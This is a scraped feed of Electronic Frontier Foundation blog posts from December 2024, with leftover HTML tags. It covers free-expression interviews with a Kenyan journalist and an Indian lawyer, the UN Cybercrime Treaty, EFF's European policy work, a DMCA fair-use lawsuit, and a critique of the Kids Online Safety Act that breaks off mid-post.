people. But what this meant was that the youth in rural Kenya who didn\u2019t have access to the internet or X were left out of that national, historic conversation. That's why I say it's not just as simple as saying you are guaranteed freedom of expression by the Constitution. It's also how governments are ensuring that we have the channels to advance this right.\u00a0\nGreene: Have you had a personal experience or any personal experiences that shaped how you feel about freedom of expression? Maybe a situation where you felt like it was being denied to you or someone close to you was in that situation?\nAt a personal level I believe that I am a product of speaking out and I try to use my voice to make an impact! There is also this one particular incident that stands out during my early career as a journalist. In 2014 I amplified a story from a video shared on facebook by writing a news article that was published on The Kenya Forum, which at the time was one of the two publications that were fully digital in the country covering news and feature articles.\nThe story, which was a case of gender based assault, gained traction drawing attention to the unfortunate incident that had seen a woman stripped naked allegedly for being \u201cdressed indecently.\u201d The public uproar sparked the famous #MyDressMyChoice protest in Kenya where women took to the streets countrywide to protest against sexual violence.\nGreene: Wow. Do you have any other specific stories that you can tell about the time when you spoke up and you felt that it made a difference? Or maybe you spoke up, and there was some resistance to you speaking up?\u00a0\nI've had many moments where I've spoken up and it's made a difference including the incident I shared in the previous question. But, on the other hand, I also had a moment where I did not speak out years ago, when a classmate in primary school was accused of theft.\u00a0\nThere was this girl once in class, she was caught with books that didn't belong to her and she was accused of stealing them. One of the books she had was my deskmate\u2019s and I was there when she had borrowed it. So she was defending herself and told the teacher, \u201cWinnie was there when I borrowed the book.\u201d When the teacher asked me if this was true I just said, \u201cI don't know.\u201d That feedback was her last line of defense and the girl got expelled from school. So I\u2019ve always wondered, if I'd said yes, would the teacher have been more lenient and realized that she had probably just borrowed the rest of the books as well? I was only eight years old at the time, but because of that, and how bad the outcome made me feel, I vowed to myself to always stand for the truth even when it\u2019s unpopular with everyone else in the room. I would never look the other way in the face of an injustice or in the face of an issue that I can help resolve. I will never walk away in silence.\nGreene: Have you kept to that since then?\u00a0\nAbsolutely.\nGreene: Okay, I want to switch tracks a little bit. Do you feel there are situations where it's appropriate for government to limit someone's speech?\nYes, absolutely. In today\u2019s era of disinformation and hate speech, it\u2019s crucial to have legal frameworks that safeguard society. We live in a society where people, especially politicians, often make inflammatory statements to gain political mileage, and such remarks can lead to serious consequences, including civil unrest.\nKenya\u2019s experience during the 2007-2008 elections is a powerful reminder of how harmful speech can escalate tensions and pit communities against each other. That period taught us the importance of being mindful of what leaders say, as their words have the power to unite or divide.\nI firmly believe that governments must strike a balance between protecting freedom of speech and preventing harm. While everyone has the right to express themselves, that right ends where it begins to infringe on the rights and safety of others. It\u2019s about ensuring that freedom of speech is exercised responsibly to maintain peace and harmony in society.\nGreene: So what do we have to be careful about with giving the government the power to regulate speech? You mentioned hate speech can be hard to define. What's the risk of letting the government define that?\nThe risk is that the government may overstep its boundaries, as often happens. Another concern is the lack of consistent and standardized enforcement. For instance, someone with influence or connections within the government might escape accountability for their actions, while an activist doing the same thing could face arrest. This disparity in treatment highlights the risks of uneven application of the law and potential misuse of power.\nGreene: Earlier you mentioned special concern for access to information. You mentioned children and you mentioned women. Both of those are groups of people where, at least in some places, someone else\u2014not the government, but some other person\u2014might control their access, right? I wonder if you could talk a little bit more about why it's so important to ensure access to information for those particular groups.\u00a0\nI believe home is the foundational space where access to information and freedom of expression are nurtured. Families play a crucial role in cultivating these values, and it\u2019s important for parents to be intentional about fostering an environment where open communication and access to information are encouraged. Parents have a responsibility to create opportunities for discussion within their households and beyond.\nOutside the family, communities provide broader platforms for engagement. In Kenya, for example, public forums known as barazas serve as spaces where community members gather to discuss pressing issues, such as insecurity and public utilities, and to make decisions that impact the neighborhood. Ensuring that your household is represented in these forums is essential to staying informed and being part of decisions that directly affect you.\nIt\u2019s equally important to help people understand the power of self-expression and active participation in decision-making spaces. By showing up and speaking out, individuals can contribute to meaningful change. Additionally, exposure to information and critical discussions is vital in today\u2019s world, where misinformation and disinformation are prevalent. Families can address these challenges by having conversations at the dinner table, asking questions like, \u201cHave you heard about this? What\u2019s your understanding of misinformation? How can you avoid being misled online?\u201d\nBy encouraging open dialogue and critical thinking in everyday interactions, we empower one another to navigate information responsibly and contribute to a more informed and engaged society.\nGreene: Now, a question we ask everyone, who is your free speech hero?\u00a0\nI have two. One is a Human Rights lawyer and a former member of Parliament Gitobu Imanyara.\u00a0 He is one of the few people in Kenya who fought by blood and sweat, literally, for the freedom of speech and that of the press in Kenya. He will always be my hero when we talk about press freedom. We are one of the few countries in Africa that enjoys extreme freedoms around speech and press freedom and it\u2019s thanks to people like him.\u00a0\nThe other is an activist named Boniface Mwangi. He\u2019s a person who never shies away from speaking up. It doesn\u2019t matter who you are or how dangerous it gets, Boni, as he is popularly known, will always be that person who calls out the government when things are going wrong. You\u2019re driving on the wrong side of the traffic just because you\u2019re a powerful person in government. He'll be the person who will not move his car and he\u2019ll tell you to get back in your lane. I like that. I believe when we speak up we make things happen.\nGreene: Anything else you want to add?\u00a0\nI believe it\u2019s time we truly recognize and understand the importance of freedom of expression and speech. Too often, these rights are mentioned casually or taken at face value, without deeper reflection. We need to start interrogating what free speech really means, the tools that enable it, and the ways in which this right can be infringed upon.\nAs someone passionate about community empowerment, I believe the key lies in educating people about these rights\u2014what it looks like when they are fully exercised and what it means when they are violated and especially in today\u2019s digital age. Only by raising awareness can we empower individuals to embrace these freedoms and advocate for better policies that protect and regulate them effectively. This understanding is essential for fostering informed, engaged communities that can demand accountability and meaningful change.<\/p><\/div><\/li>
<\/span><\/a><\/div>\u201cCan the Government Read My Text Messages?\u201d<\/a><\/span>
by Christian Romero<\/a> on December 18, 2024 at 4:52 pm <\/small>
You should be able to message your family and friends without fear that law enforcement is reading everything you send. Privacy is a human right, and that\u2019s why we break down the ways you can protect your ability to have a private conversation.\u00a0\nLearn how governments are able to read certain text messages, and how to ensure your messages are end-to-end encrypted on Digital Rights Bytes, our new site dedicated to helping break down tech issues into byte-sized pieces.\u00a0\u00a0\nWhether you\u2019re just starting to think about your privacy online, or you\u2019re already a regular user of encrypted messaging apps, Digital Rights Bytes is here to help answer some of the common questions that may be bothering you about the devices you use. Watch the short video that explains how to keep your communications private online--and share it with family and friends who may have asked similar questions!\u00a0\nHave you also wondered why it is so expensive to fix your phone, or if you really own the digital media you paid for? We\u2019ve got answers to those and other questions as well! And, if you\u2019ve got additional questions you\u2019d like us to answer in the future, let us know on your social platform of choice\u00a0using the hashtag #DigitalRightsBytes.\u00a0\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>10 Resources for Protecting Your Digital Security | EFFector 36.15<\/a><\/span>
by Christian Romero<\/a> on December 17, 2024 at 6:42 pm <\/small>
Get a head-start on your New Year's resolution to stay up-to-date on digital rights news by subscribing to EFF's EFFector newsletter!\u00a0\nThis edition of the newsletter covers our top ten digital security resources for those concerned about the incoming administration, a new bill that could put an end to SLAPP lawsuits, and our recent amicus brief arguing that device searches at the border require a warrant (we've been arguing this for a\u00a0long time).\nYou can read the full newsletter here, and even get future\u00a0editions directly to your inbox when you subscribe! Additionally, we've got an audio edition of EFFector on the Internet Archive, or you can view it by clicking the button below:\nLISTEN ON YouTube\nEFFECTOR 36.15 -\u00a010 Resources for Protecting Your Digital Security\nSince 1990 EFF has published EFFector to help keep readers on the bleeding edge of their digital rights. We know that the intersection of technology, civil liberties, human rights, and the law can be complicated, so EFFector is a great way to stay on top of things. The newsletter is chock full of links to updates, announcements, blog posts, and other stories to help keep readers\u2014and listeners\u2014up to date on the movement to protect online privacy and free expression.\u00a0\nThank you to the supporters around the world who make our work possible! If you're not a member yet,\u00a0join EFF today\u00a0to help us fight for a brighter digital future.<\/p><\/div><\/li>
<\/span><\/a><\/div>Still Flawed and Lacking Safeguards, UN Cybercrime Treaty Goes Before the UN General Assembly, then States for Adoption<\/a><\/span>
by Karen Gullo<\/a> on December 17, 2024 at 3:10 am <\/small>
Most UN Member States, including the U.S., are expected to support adoption of the flawed UN Cybercrime Treaty when it\u2019s scheduled to go before the UN General Assembly this week for a vote, despite warnings that it poses dangerous risks to human rights. \nEFF and its civil society partners\u2013along with cybersecurity and internet companies, press organizations, the International Chamber of Congress, the United Nations High Commissioner for Human Rights, and others\u2013for years have raised red flags that the treaty authorizes open-ended evidence gathering powers for crimes with little nexus to core cybercrimes, and has minimal safeguards and limitations.\n\u00a0The final draft, unanimously approved in August by over 100 countries that had participated in negotiations, will permit intrusive surveillance practices in the name of engendering cross-border cooperation. \nThe treaty that will go before the UN General Assembly contains many troubling provisions and omissions that don\u2019t comport with international human rights standards and leave the implementation of human rights safeguards to the discretion of Member States. Many of these Member States have poor track records on human rights and national laws that don\u2019t protect privacy while criminalizing free speech and\u00a0 gender expression. \nThanks to the work of a coalition of civil society groups that included EFF, the U.S. now seems to recognize this potential danger. In a statement by the U.S. Deputy Representative to the Economic and Social Council, the U.S. said it \u201cshares the legitimate concerns\u201d of industry and civil society, which warned that some states could leverage their human rights-challenged national legal frameworks to enable transnational repression. \nWe expressed grave concerns that the treaty facilitates requests for user data that will enable cross-border spying and the targeting and harassment of those, for example, who expose and work against government corruption and abuse. Our full analysis of the treaty can be found here.\nNonetheless, the U.S. said it will support the convention when it comes up for this vote, noting among other things that its terms don\u2019t permit parties from using it to violate or suppress human rights. \nWhile that\u2019s true as far as it goes, and is important to include in principle, some Member States\u2019 laws empowered by the treaty already fail to meet human rights standards. And the treaty fails to adopt specific safeguards to truly protect human rights.\nThe safeguards contained in the convention, such as the need for judicial review in the chapter on procedural measures in criminal investigations, are undermined by being potentially discretionary and contingent on state\u2019s domestic laws. In many countries, these domestic laws don\u2019t require judicial authorization based on reasonable suspicion for surveillance and or real-time collection of traffic.\nFor example, our partner Access Now points out that in Algeria, Lebanon, Palestine, Tunisia, and Egypt, cybercrime laws require telecommunications service providers to preemptively and systematically collect large amounts of user data without judicial authorization. \nMeanwhile, Jordan\u2019s cybercrime law has been used against LGBTQ+ people, journalists, human rights defenders, and those criticizing the government.\nThe U.S. says it is committed to combating human rights abuses by governments that misuse national cybercrime statues and tools to target journalists and activists. Implementing the treaty, it says, must be paired with robust domestic safeguards and oversight. \nIt\u2019s hard to imagine that governments will voluntarily revise cybercrime laws as they ratify and implement the treaty; what\u2019s more realistic is that the treaty normalizes such frameworks.\nAdvocating for improvements during the two years-long negotiations was a tough slog. And while the final version is highly problematic, civil society achieved some wins. An early negotiating document named 34 purported cybercrime offenses to be included, many of which would criminalize forms of speech. Civil society warned of the dangers of including speech-related offenses; the list was dropped in later drafts. \nCivil society advocacy also helped secure specific language in the general provision article on human rights specifying that protection of fundamental rights includes freedom of expression, opinion, religion, conscience, and peaceful assembly. Left off the list, though, was gender expression. \nThe U.S., meanwhile, has called on all states \u201cto take necessary steps within their domestic legal systems to ensure the Convention will not be applied in a manner inconsistent with human rights obligations, including those relating to speech, political dissent, and sexual identity.\u201d \nFurthermore, the U.S. government pledges to demand accountability \u2013 without saying how it will do so \u2013 if states seek to misuse the treaty to suppress human rights. \u201cWe will demand accountability for States who try to abuse this Convention to target private companies\u2019 employees, good-faith cybersecurity researchers, journalists, dissidents, and others.\u201d Yet the treaty contains no oversight provisions.\nThe U.S. said it is unlikely to sign or ratify the treaty \u201cunless and until we see implementation of meaningful human rights and other legal protections by the convention\u2019s signatories.\u201d\nWe\u2019ll hold the government to its word on this and on its vows to seek accountability. But ultimately,\u00a0the\u00a0destiny of the U.S declarations and the treaty\u2019s impact in the U.S are more than uncertain under a second Trump administration, as ratification would require both the Senate\u2019s consent and the President's formal ratification. \nTrump\u00a0withdrew from climate, trade, and arms agreements in his first term, so signing the UN Cybercrime Treaty may not be in the cards\u00a0\u2013 a positive outcome, though probably not motivated by concerns for human rights.\nMeanwhile, we urge states to vote against adoption this week and not ratify the treaty at home. The document puts global human rights at risk. In a rush to to win consensus, negotiators gave Member States lots of leeway to\u00a0avoid\u00a0human rights safeguards in their \u201ccriminal\u201d investigations, and now millions of people around the world might pay a high price.\n\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Saving the Internet in Europe: How EFF Works in Europe<\/a><\/span>
by Jillian C. York<\/a> on December 16, 2024 at 4:32 pm <\/small>
This post is part one in a series of posts about EFF\u2019s work in Europe.\nEFF\u2019s mission is to ensure that technology supports freedom, justice, and innovation for all people of the world. While our work has taken us to far corners of the globe, in recent years we have worked to expand our efforts in Europe, building up a policy team with key expertise in the region, and bringing our experience in advocacy and technology to the European fight for digital rights.\nIn this blog post series, we will introduce you to the various players involved in that fight, share how we work in Europe, and how what happens in Europe can affect digital rights across the globe.\nWhy EFF Works in Europe\nEuropean lawmakers have been highly active in proposing laws to regulate online services and emerging technologies. And these laws have the potential to impact the whole world. As such, we have long recognized the importance of engaging with organizations and lawmakers across Europe. In 2007, EFF became a member of the European Digital Rights Initiative (EDRi), a collective of NGOs, experts, advocates and academics that have for two decades worked to advance digital rights throughout Europe. From the early days of the movement, we fought back against legislation threatening user privacy in Germany, free expression in the UK, and the right to innovation across the continent.\nOver the years, we have continued collaborations with EDRi as well as other coalitions including IFEX, the international freedom of expression network, Reclaim Your Face, and Protect Not Surveil. In our EU policy work, we have advocated for fundamental principles like transparency, openness, and information self-determination. We emphasized that legislative acts should never come at the expense of protections that have served the internet well: Preserve what works. Fix what is broken. And EFF has made a real difference: We have ensured that recent internet regulation bills don\u2019t turn social networks into censorship tools and safeguarded users\u2019 right to private conversations. We also helped guide new fairness rules in digital markets to focus on what is really important: breaking the chokehold of major platforms over the internet.\nRecognizing the internet\u2019s global reach, we have also stressed that lawmakers must consider the global impact of regulation and enforcement, particularly effects on vulnerable groups and underserved communities. As part of this work, we facilitate a global alliance of civil society organizations representing diverse communities across the world to ensure that non-European voices are heard in Brussels\u2019 policy debates. \nOur Teams\nToday, we have a robust policy team that works to influence policymakers in Europe. Led by International Policy Director Christoph Schmon and supported by Assistant Director of EU Policy Svea Windwehr, both of whom are based in Europe, the team brings a set of unique expertise in European digital policy making and fundamental rights online. They engage with lawmakers, provide policy expertise and coordinate EFF\u2019s work in Europe. \nBut legislative work is only one piece of the puzzle, and as a collaborative organization, EFF pulls expertise from various teams to shape policy, build capacity, and campaign for a better digital future. Our teams engage with the press and the public through comprehensive analysis of digital rights issues, educational guides, activist workshops, press briefings, and more. They are active in broad coalitions across the EU and the UK, as well as in East and Southeastern Europe. \nOur work does not only span EU digital policy issues. We have been active in the UK advocating for user rights in the context of the Online Safety Act, and also work on issues facing users in the Balkans or accession countries. For instance, we recently collaborated with Digital Security Lab Ukraine on a workshop on content moderation held in Warsaw, and participated in the Bosnia and Herzegovina Internet Governance Forum. We are also an active member of the High-Level Group of Experts for Resilience Building in Eastern Europe, tasked to advise on online regulation in Georgia, Moldova and Ukraine.\nEFF on Stage\nIn addition to all of the behind-the-scenes work that we do, EFF regularly showcases our work on European stages to share our mission and message. You can find us at conferences like re:publica, CPDP, Chaos Communication Congress, or Freedom not Fear, and at local events like regional Internet Governance Forums. For instance, last year Director for International Freedom of Expression Jillian C. York gave a talk with Svea Windwehr at Berlin\u2019s re:publica about transparency reporting. More recently, Senior Speech and Privacy Activist Paige Collings facilitated a session on queer justice in the digital age at a workshop held in Bosnia and Herzegovina.\nThere is so much more work to be done. In the next posts in this series, you will learn more about what EFF will be doing in Europe in 2025 and beyond, as well as some of our lessons and successes from past struggles.<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Prasanth Sugathan<\/a><\/span>
by David Greene<\/a> on December 13, 2024 at 7:37 pm <\/small>
Interviewer: David Greene\nThis interview has been edited for length and clarity.\nPrasanth Sugathan is Legal Director at Software Freedom Law Center, India. (SFLC.in). Prasanth is a lawyer with years of practice in the fields of technology law, intellectual property law, administrative law and constitutional law. He is an engineer turned lawyer and has worked closely with the Free Software community in India. He has appeared in many landmark cases before various Tribunals, High Courts and the Supreme Court of India. He has also deposed before Parliamentary Committees on issues related to the Information Technology Act and Net Neutrality.\nDavid Greene: Why don\u2019t you go ahead and introduce yourself.\u00a0\nSugathan: I am Prasanth Sugathan, I am the Legal Director at the Software Freedom Law Center, India. We are a nonprofit organization based out of New Delhi, started in the year 2010. So we\u2019ve been working at this for 14 years now, working mostly in the area of protecting rights of citizens in the digital space in India. We do strategic litigation, policy work, trainings, and capacity building. Those are the areas that we work in.\u00a0\nGreene: What was your career path? How did you end up at SFLC?\u00a0\nThat\u2019s an interesting story. I am an engineer by training. Then I was interested in free software. I had a startup at one point and I did a law degree along with it. I got interested in free software and got into it full time. Because of this involvement with the free software community, the first time I think I got involved in something related to policy was when there was discussion around software patents. When the patent office came out with a patent manual and there was this discussion about how it could affect the free software community and startups. So that was one discussion I followed, I wrote about it, and one thing led to another and I was called to speak at a seminar in New Delhi. That\u2019s where I met Eben and Mishi from the Software Freedom Law Center. That was before SFLC India was started, but then once Mishi started the organization I joined as a Counsel. It\u2019s been a long relationship.\u00a0\nGreene: Just in a personal sense, what does freedom of expression mean to you?\u00a0\nApart from being a fundamental right, as evident in all the human rights agreements we have, and in the Indian Constitution,\u00a0 freedom of expression is the most basic aspect for a democratic nation. I mean without free speech you can not have a proper exchange of ideas, which is most important for a democracy. For any citizen to speak what they feel, to communicate their ideas, I think that is most important. As of now the internet is a medium which allows you to do that. So there definitely should be minimum restrictions from the government and other agencies in relation to the free exchange of ideas on this medium.\u00a0\nGreene: Have you had any personal experiences with censorship that have sort of informed or influenced how you feel about free expression?\u00a0\nWhen SFLC.IN was started in 2010 our major idea was to support the free software community. But then how we got involved in the debates on free speech and privacy on the internet was when in 2011 there were the IT Rules were introduced by the government as a draft for discussion and finally notified. This was on\u00a0 regulation of intermediaries, these online platforms. This was secondary legislation based on the Information Technology Act (IT Act) in India, which is the parent law. So when these discussions happened we got involved in it and then one thing led to another. For example, there was a provision in the IT Act called Section 66-A which criminalized the sending of offensive messages through a computer or other communication devices. It was, ostensibly, introduced to protect women. And the irony was that two women were arrested under this law. That was the first arrest that happened, and it was a case of two women being arrested for the comments that they made about a leader who expired.\u00a0\nThis got us working on trying to talk to parliamentarians, trying to talk to other people about how we could maybe change this law. So there were various instances of content being taken down and people being arrested, and it was always done under Section 66-A of the IT Act. We challenged the IT Rules before the Supreme Court. In a judgment in a 2015 case called Shreya Singhal v. Union of India the Supreme Court read down the rules relating to intermediary liability. As for the rules, the platforms could be asked to take down the content. They didn\u2019t have much of an option. If they don\u2019t do that, they lose their safe harbour protection. The Court said it can only be actual knowledge and what actual knowledge means is if someone gets a court order asking them to take down the content. Or let\u2019s say there\u2019s direction from the government. These are the only two cases when content could be taken down.\nGreene: You\u2019ve lived in India your whole life. Has there ever been a point in your life when you felt your freedom of expression was restricted?\u00a0\nCurrently we are going through such a phase, where you\u2019re careful about what you\u2019re speaking about. There is a lot of concern about what is happening in India currently. This is something we can see mostly impacting people who are associated with civil society. When they are voicing their opinions there is now a kind of fear about how the government sees it, whether they will take any action against you for what you say, and how this could affect your organization. Because when you\u2019re affiliated with an organization it\u2019s not just about yourself. You also need to be careful about how anything that you say could affect the organization and your colleagues. We\u2019ve had many instances of nonprofit organizations and journalists being targeted. So there is a kind of chilling effect when you really don\u2019t want to say something you would otherwise say strongly. There is always a toning down of what you want to say.\u00a0\nGreene: Are there any situations where you think it\u2019s appropriate for governments to regulate online speech?\u00a0\nYou don\u2019t have an absolute right to free speech under India\u2019s Constitution. There can be restrictions as stated under Article 19(2) of the Constitution. There can be reasonable restrictions by the government, for instance, for something that could lead to violence or something which could lead to a riot between communities. So mostly if you look at hate speech on the net which could lead to a violent situation or riots between communities, that could be a case where maybe the government could intervene. And I would even say those are cases where platforms should intervene. We have seen a lot of hate speech on the net during India\u2019s current elections as there have been different phases of elections going on for close to two months. We have seen that happening with not just political leaders but with many supporters of political parties publishing content on various platforms which aren\u2019t really in the nature of hate speech but which could potentially create situations where you have at least two communities fighting each other. It\u2019s definitely not a desirable situation. Those are the cases where maybe platforms themselves could regulate or maybe the government needs to regulate. In this case, for example, when it is related to elections, the Election Commission also has its role, but in many cases we don\u2019t see that happening.\u00a0\nGreene: Okay, let\u2019s go back to hate speech for a minute because that\u2019s always been a very difficult problem. Is that a difficult problem in India? Is hate speech well-defined? Do you think the current rules serve society well or are there problems with it?\u00a0\nI wouldn\u2019t say it\u2019s well-defined, but even in the current law there are provisions that address it. So anything which could lead to violence or which could lead to animosity between two communities will fall in the realm of hate speech. It\u2019s not defined as such, but then that is where your free speech rights could be restricted. That definitely could fall under the definition of hate speech.\u00a0\nGreene: And do you think that definition works well?\u00a0\nI mean the definition is not the problem. It\u2019s essentially a question of how it is implemented. It\u2019s a question of how the government or its agency implements it. It\u2019s a question of how platforms are taking care of it. These are two issues where there\u2019s more that needs to be done.\u00a0\nGreene: You also talked about misinformation in terms of elections. How do we reconcile freedom of expression concerns with concerns for preventing misinformation?\u00a0\nI would definitely say it\u2019s a gray area. I mean how do you really balance this? But I don\u2019t think it\u2019s a problem which cannot be addressed. Definitely there\u2019s a lot for civil society to do, a lot for the private sector to do. Especially, for example, when hate speech is reported to the platforms. It should be dealt with quickly, but that is where we\u2019re seeing the worst difference in how platforms act on such reporting in the Global North versus what happens in the Global South. Platforms need to up their act when it comes to handling such situations and handling such content.\u00a0\nGreene: Okay, let\u2019s talk about the platforms then. How do you feel about censorship or restrictions on freedom of expression by the platforms?\u00a0\nThings have changed a lot as to how these platforms work. Now the platforms decide what kind of content gets to your feed and how the algorithms work to promote content which is more viral. In many cases we have seen how misinformation and hate speech goes viral. And content that is debunking the misinformation which is kind of providing the real facts, that doesn\u2019t go as far. The content that debunks misinformation doesn\u2019t go viral or come up in your feed that fast. So that definitely is a problem, the way platforms are dealing with it. In many cases it might be economically beneficial for them to make sure that content which is viral and which puts forth misinformation reaches more eyes.\u00a0\nGreene: Do you think that the platforms that are most commonly used in India\u2014and I know there\u2019s no TikTok in India\u2014 serve free speech interests or not?\u00a0\nWhen the Information Technology Rules were introduced and when the discussions happened, I would say civil society supported the platforms, essentially saying these platforms ensured we can enjoy our free speech rights, people can enjoy their free speech rights and express themselves freely. How the situation changed over a period of time is interesting. Definitely these platforms are still important for us to express these rights. But when it comes to, let\u2019s say, content being regulated, some platforms do push back when the government asks them to take down the content, but we have not seen that much. So whether they\u2019re really the messiahs for free speech, I doubt. Over the years, we have seen that it is most often the case that when the government tells them to do something, it is in their interest to do what the government says. There has not been much pushback except for maybe Twitter challenging it in the court.\u00a0 There have not been many instances where these platforms supported users.\u00a0\nGreene: So we\u2019ve talked about hate speech and misinformation, are there other types of content or categories of online speech that are either problematic in India now or at least that regulators are looking at that you think the government might try to do something with?\u00a0\nOne major concern which the government is trying to regulate is about deepfakes, with even the Prime Minister speaking about it. So suddenly that is something of a priority for the government to regulate. So that\u2019s definitely a problem, especially when it comes to public figures and particularly women who are in politics who often have their images manipulated. In India we see that at election time. Even politicians who have been in the field for a long time, their images have been misused and morphed images have been circulated. So that\u2019s definitely something that the platforms need to act on. For example, you cannot have the luxury of, let\u2019s say, taking 48 hours to decide what to do when something like that is posted. This is something which platforms have to deal with as early as possible. We do understand there\u2019s a lot of content and a lot of reporting happening, but in some cases, at least, there should be some prioritization of these reporting related to non-consensual sexual imagery. Maybe then the priority should go up.\u00a0\nGreene: As an engineer, how do you feel about deepfake tech? Should the regulatory concerns be qualitatively different than for other kinds of false information?\u00a0\nWhen it comes to deepfakes, I would say the problem is that it has become more mainstream. It has become very easy for a person to use these tools that have become more accessible. Earlier you needed to have specialized knowledge, especially when it came to something like editing videos. Now it\u2019s become much easier. These tools are made easily available. The major difference now is how easy it is to access these applications. There can not be a case of fully regulating or fully controlling a technology. It\u2019s not essentially a problem with the technology, because there would be a lot of ethical use cases. Just because something is used for a harmful purpose doesn\u2019t mean that you completely block the technology. There is definitely a case for regulating AI and regulating deepfakes, but that doesn\u2019t mean you put a complete stop to it.\u00a0\nGreene: How do you feel about TikTok being banned in India?\u00a0\nI think that\u2019s less a question of technology or regulation and more of a geopolitical issue. I don\u2019t think it has anything to do with the technology or even the transfer of data for that matter. I think it was just a geopolitical issue related to India\/ China relations. The relations have kind of soured with the border disputes and other things, I think that was the trigger for the TikTok ban.\u00a0\nGreene: What is your most significant legal victory from a human rights perspective and why?\u00a0\nThe victory that we had in the fight against the 2011 Rules and the portions related to intermediary liability, which was shot down by the Supreme Court. That was important because when it came to platforms and when it came to people expressing their critical views online, all of this could have been taken down very easily. So that was definitely a case of free speech rights being affected without much recourse. So that was a major victory.\u00a0\nGreene: Okay, now we ask everyone this question. Who is your free speech hero and why?\nI can\u2019t think of one person, but I think of, for example, when the country went through a bleak period in the 1970s and the government declared a national state of emergency. During that time we had journalists and politicians who fought for free speech rights with respect to the news media. At that time even writing something in the publications was difficult. We had many cases of journalists who were fighting this, people who had gone to jail for writing something, who had gone to jail for opposing the government or publicly criticizing the government. So I don\u2019t think of just one person, but we have seen journalists and political leaders fighting back during that state of emergency. I would say those are the heroes who could fight the government, who could fight law enforcement. Then there was the case of Justice H.R. Khanna, a judge who stood up for citizen\u2019s rights and gave his dissenting opinion against the majority view, which cost him the position of Chief Justice. Maybe I would say he\u2019s a hero, a person who was clear about constitutional values and principles.<\/p><\/div><\/li>
<\/span><\/a><\/div>EFF Speaks Out in Court for Citizen Journalists<\/a><\/span>
by Betty Gedlu<\/a> on December 12, 2024 at 10:11 pm <\/small>
No one gets to abuse copyright to shut down debate. Because of that, we at EFF represent Channel 781, a group of citizen journalists whose YouTube channel was temporarily shut down following copyright infringement claims made by Waltham Community Access Corporation (WCAC). As part of that case, the federal court in Massachusetts heard oral arguments in Channel 781 News v. Waltham Community Access Corporation, a pivotal case for copyright law and digital journalism.\u00a0 \nWCAC, Waltham\u2019s public access channel, records city council meetings on video. Channel 781, a group of independent journalists, curates clips of those meetings for its YouTube channel, along with original programming, to spark debate on issues like housing policy and real estate development. WCAC sent a series of DMCA takedown notices that accused Channel 781 of copyright infringement, resulting in YouTube deactivating Channel 781\u2019s channel just days before a critical municipal election.\nRepresented by EFF and the law firm Brown Rudnick LLP, Channel 781 sued WCAC for misrepresentations in its DMCA takedown notices. We argued that using clips of government meetings from the government access station to engage in public debate is an obvious fair use under copyright. Also, by excerpting factual recordings and using captions to improve accessibility, the group aims to educate the public, a purpose distinct from WCAC\u2019s unannotated broadcasts of hours-long meetings. The lawsuit alleges that WCAC\u2019s takedown requests knowingly misrepresented the legality of Channel 781's use, violating Section 512(f) of the DMCA.\nFighting a Motion to Dismiss\nIn court this week, EFF pushed back against WCAC\u2019s motion to dismiss the case. We argued to District Judge Patti Saris that Channel 781\u2019s use of video clips of city government meetings was an obvious fair use, and that by failing to consider fair use before sending takedown notices to YouTube, WCAC violated the law and should be liable for damages.\nIf Judge Saris denies WCAC\u2019s motion, we will move on to proving our case. We\u2019re confident that the outcome will promote accountability for copyright holders who misuse the powerful notice-and-takedown mechanism that the DMCA provides, and also protect citizen journalists in their use of digital tools.\nEFF will continue to provide updates as the case develops. Stay tuned for the latest news on this critical fight for free expression and the protection of digital rights.<\/p><\/div><\/li>
<\/span><\/a><\/div>X's Last-Minute Update to the Kids Online Safety Act Still Fails to Protect Kids\u2014or Adults\u2014Online<\/a><\/span>
by Jason Kelley<\/a> on December 12, 2024 at 7:40 pm <\/small>
Late last week, the Senate released yet another version of the Kids Online Safety Act, written, reportedly, with the assistance of X CEO Linda Yaccarino in a flawed attempt to address the critical free speech issues inherent in the bill. This last minute draft remains, at its core, an unconstitutional censorship bill that threatens the online speech and privacy rights of all internet users.\u00a0\nTELL CONGRESS:\u00a0VOTE NO ON KOSA\nno kosa\u00a0in\u00a0last minute funding bills\nUpdate Fails to Protect Users from Censorship or Platforms from Liability\nThe most important update, according to its authors, supposedly minimizes the impact of the bill on free speech. As we\u2019ve said before, KOSA\u2019s \u201cduty of care\u201d section is its biggest problem, as it would force a broad swath of online services to make policy changes based on the content of online speech. Though the bill\u2019s authors inaccurately claim KOSA only regulates designs of platforms, not speech, the list of harms it enumerates\u2014eating disorders, substance use disorders, and suicidal behaviors, for example\u2014are not caused by the design of a platform.\u00a0\nThe authors have failed to grasp the difference between immunizing individual expression and protecting\u00a0a\u00a0platform from the liability that KOSA would place on it. \nKOSA is likely to actually increase the risks to children, because it will prevent them from accessing online resources about topics like addiction, eating disorders, and bullying. It will result in services imposing age verification requirements and content restrictions, and it will stifle minors from finding or accessing their own supportive communities online. For these reasons, we\u2019ve been critical of KOSA since it was introduced in 2022.\u00a0\nThis updated bill adds just one sentence to the \u201cduty of care\u201d requirement:\u201cNothing in this section shall be construed to allow a government entity to enforce subsection a [the duty of care] based upon the viewpoint of users expressed by or through any speech, expression, or information protected by the First Amendment to the Constitution of the United States.\u201d But the viewpoint of users was never impacted by KOSA\u2019s duty of care in the first place. The duty of care is a duty imposed on platforms, not users. Platforms must mitigate the harms listed in the bill, not users, and the platform\u2019s ability to share users\u2019 views is what\u2019s at risk\u2014not the ability of users to express those views. Adding that the bill doesn\u2019t impose liability based on user expression doesn\u2019t change how the bill would be interpreted or enforced. The FTC could still hold a platform liable for the speech it contains.\nLet\u2019s say, for example, that a covered platform like reddit hosts a forum created and maintained by users for discussion of overcoming eating disorders. Even though the speech contained in that forum is entirely legal, often helpful, and possibly even life-saving, the FTC could still hold reddit liable for violating the duty of care by allowing young people to view it. The same could be true of a Facebook group about LGBTQ issues, or for a post about drug use that X showed a user through its algorithm. If a platform\u2019s defense were that this information is protected expression, the FTC could simply say that they aren\u2019t enforcing it based on the expression of any individual viewpoint, but based on the fact that the platform allowed a design feature\u2014a subreddit, Facebook group, or algorithm\u2014to distribute that expression to minors. It\u2019s a superfluous carveout for user speech and expression that KOSA never penalized in the first place, but which the platform would still be penalized for distributing.\u00a0\nIt\u2019s particularly disappointing that those in charge of X\u2014likely a covered platform under the law\u2014had any role in writing this language, as the authors have failed to grasp the world of difference between immunizing individual expression, and protecting their own platform from the liability that KOSA would place on it.\u00a0\u00a0\nCompulsive Usage Doesn\u2019t Narrow 